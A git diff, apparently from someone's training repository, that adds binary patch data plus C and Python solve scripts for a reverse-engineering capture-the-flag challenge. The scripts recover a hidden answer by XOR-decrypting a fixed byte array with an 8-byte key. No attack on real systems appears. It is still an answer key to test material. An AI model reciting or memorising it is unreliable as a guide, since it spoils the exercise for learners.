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 literal 0 HcmV?d00001 diff --git a/training/htb/challenges/rev/solve b/training/htb/challenges/rev/solve new file mode 100755 index 0000000000000000000000000000000000000000..bdad487cd6478d8415f69b8f3ce67002010eb483 GIT binary patch literal 16064 zcmeHOYit}>6~4P0$4>LuO=8nLXgsarDlPHGjvthyY1XmV8K+KS{3zuSMr-fdyUKdk z-5sZPX~4*B$tpw&{ZRqpAN(+=5>16lh>&m^NKyoUy8Q3`h7mZ6c7&yk~%^*5@E&1xgbPDJRpMj ztrXkDO28{{M5J2fdcamNFOzlzli%}Fukw#dJLViAaq?S^zD@ywm9}|k-VFv_w$H_E?i%=y$R{3a!vX%=k~g;oALjoy${rqpka}5l`e21F5{3$aNoXPG>WT?pSX+fyxI4vl-c(VVf>#Ct^Mm_mWW9|~%jW~*bFzU=5nInV z%ai+UoccChOQx$XTy{}QHRZys=cja-cH!>(WX6S;a^=J$wm_JCL|H(Y3+G(fmfo+I z0WSky2D}V-8SpaTWx&h8hmnD|g4^EF$8VMCr%NvG5<-7^()1Un^zomTU9y@hHvAlL zvFaE24OT`_A~{LA8#6^v)ypK)Q1ZqUM5?d$&uxWkpVteo>Eo}@b#zB-Cu?8P&+K~y zM#YMUVg7c1I9U0VRX^}=0MXBsJWK2o^JWD?2~!!NtSZg~E62$2lH{;YS@sRR#O}MT z7v}VfZ|v7E&IfegW&PT1vm6z?7q%-XE6(%>D>2Ase~NExUln}Ca9xi+zVCOi6nf#h zxmG{DZzb?z#Z^GFeK?uRCGVo>J9cRyUeps2{R=YHcVhsyJ*Y!3oSfDR!&Ca{D0p=4 zO7s@R4si3Utu`;+>Goddo8hZ;|A zK^%ysXIekMt)a5?{<|JrtzUSos`pc0tl791x*6zZuSDk_D-8?%eCMG1pKWk(U8416~Ha40svvGT>#v%Yc^wF9Ti%ybOF;8Svp7Q#{d^ z8yzwe@jY5q{tirdw+8moERw#*teGnoKL`FGIHu8};mu-^X71;}zXML+EQx$ibPC@{ z$hUP(Y1vs!^a-bL_j7+K7Vjm4mQw4>)OHl>aZCWOA$(n^b={^z!PSqKjfwqR_TFE& z-TM4TzSQn_(e9IE*R(G5jK6v9O8?_%!LFO|62x(Ck^Xs0PY}^-e+ZNW#Ju&*iM~^5 z1cIpT?TCSh0>f!LvW9X6j(VxL;)iU17YmfF;8JL1V3Qx8^g<#~wmN`nRxem7x)sn+ zoAeEhzVG_S#3W(#;)KX2e2ZkiB9kq}N%rJVL>L_&c^U9B;AOzefR_O;16~Ha40svv zGVuSI0bUo#>i~IvL2D0**4WHhh=}iY7LCY7otvf1>kYR`8B;Ecwn)zF4r!i7#QMM9 zE@nx-Di`_jn!yP02HnV0>RNN$Gnuobbx`|o2&XCtC(%g!O=cBy# z@J<^RN!c*t6EZN4ds5nAQKm)Q{y&QL`2e&`Z%a8T{V{#C&X@Cy>8d4nO8wuZ%yG-= z|L2U?kE;zg(xej9D!DBo{}H=%u(^4UwgWTH`?T7|aBa9&+g-D}v8KL`6V46_r+lms zZx$6;P=0-4qu}-8nl#u5zLb3>a6fwOm=fRJ5`RI#>D>a^bN`2E(INc$#1^4NY?-gu zBNkpExIf!kAx@$|_3-_~c)_wSch=)FK7qng@xQPPe!;3IB&IbK6k4jDtFZBjj|lZT zUbB3Ig4e@yRj*t2o1FWE@pn*IYW?<|NQlNpF8-v2Zx*453q-LF_y**sO|C<>-q8Tx z4?H9`J9%cWR4y6-#D;Ta>+JaWvr;J!G7aKJa88bI3`g5_tgb^Pe z92|v0psCgM0Kgv zTRMetu>I(Prgr0KYin1u+vsjO&>n?{x*s6I>;3=D%Klt7jr|k@#z;0Nj6^(U#)Nfh zsB!U@1E<1zxwpUpXh#9E2v>W90EET61&nw;Yb0ZtIPD~8I|{3KDq{@i6LB<|!H?0K z&r4sqmjSyEI2W`nVadG)i+4OM4u?`ML^wY>XvTWM&794XT*_q4M0g-G9PS-XVNXda zF2dL_k;n}R3r)uINfC~ZW>AC8&77?{k;vs!*~}urfG(Fv$H+mJhSDb0h$zBlVg$d` zU!cocDGn!+vWFz&@MQ^sTKz_Zo$!Wo*`Y+v9FhSapR%jwG9ri#ruqd*k91%(w&C`9oX4EU zbuh6=jlTmZjiK0|$4$)n@y7A99rI)Gr!g7JJT7A%v0Am?ySw9;ut=job+bQ@3z<(! zLvCL^{}a;xfVAUrCi5DXKjlpI9|J~l@wnJ|p34*G@i$B?;y76T0t#+_P5LqC_Ss&l zoo1d<{Q3Wl`MsPNSpoZVeP31l`Tw0c&o9_sjsIEc?=+)HOUY?m=qA=*JEN@n z|5EYiaW!*I@mJ6P_t0Y$P*ACy+qJbc24C9$j}5lPHpM{^#XkXQ*oVvj literal 0 HcmV?d00001 diff --git a/training/htb/challenges/rev/solve.c b/training/htb/challenges/rev/solve.c new file mode 100644 index 0000000..efe2043 --- /dev/null +++ b/training/htb/challenges/rev/solve.c @@ -0,0 +1,42 @@ +#include + +char rolling_xor(char *key, char* encrypted_data) +{ + char* v0 = key; + int v1 = 0; + char *i = encrypted_data; + char result; + + for ( ; *i; ++i ) + { + result = *v0; + *i ^= *v0++; + if ( ++v1 == 8 ) + { + v0 = key; + v1 = 0; + } + } + return result; +} + +int main(){ + char encrypted_data[] = + { + 0x09, 0x07, 0x11, 0x48, 0x20, 0x73, 0x02, 0x68, 0x2C, 0x67, + 0x62, 0x02, 0x3E, 0x36, 0x7D, 0x1A, 0x1E, 0x35, 0x1F, 0x07, + 0x2A, 0x1D, 0x3C, 0x0B, 0x71, 0x25, 0x62, 0x57, 0x7E, 0x30, + 0x13, 0x3B, 0x71, 0x07, 0x2E, 0x00 + }; + + char key[] = + { + 0x52, 0x4A, 0x4A, 0x33, 0x44, 0x53, 0x43, 0x50, 0x00 + }; + + + rolling_xor(key, encrypted_data); + + printf("decrypted: %s\n", encrypted_data); + +} diff --git a/training/htb/challenges/rev/solve.py b/training/htb/challenges/rev/solve.py new file mode 100644 index 0000000..a07adf2 --- /dev/null +++ b/training/htb/challenges/rev/solve.py @@ -0,0 +1,25 @@ +from pwn import xor + +with open("./encrypted_data.txt", "r") as f: + data = f.readline() + +key = bytes.fromhex("524A4A3344534350") + +print(len(key)) + +dec_key = [] + +for s in key: + s -= 17 + if s < ord('A'): + s += 26 + dec_key.append(s) + +dec_key[3] = b"3"[0] + +print("".join(chr(c) for c in dec_key)) + +data = bytes.fromhex(data) + +print(xor(data, dec_key)) +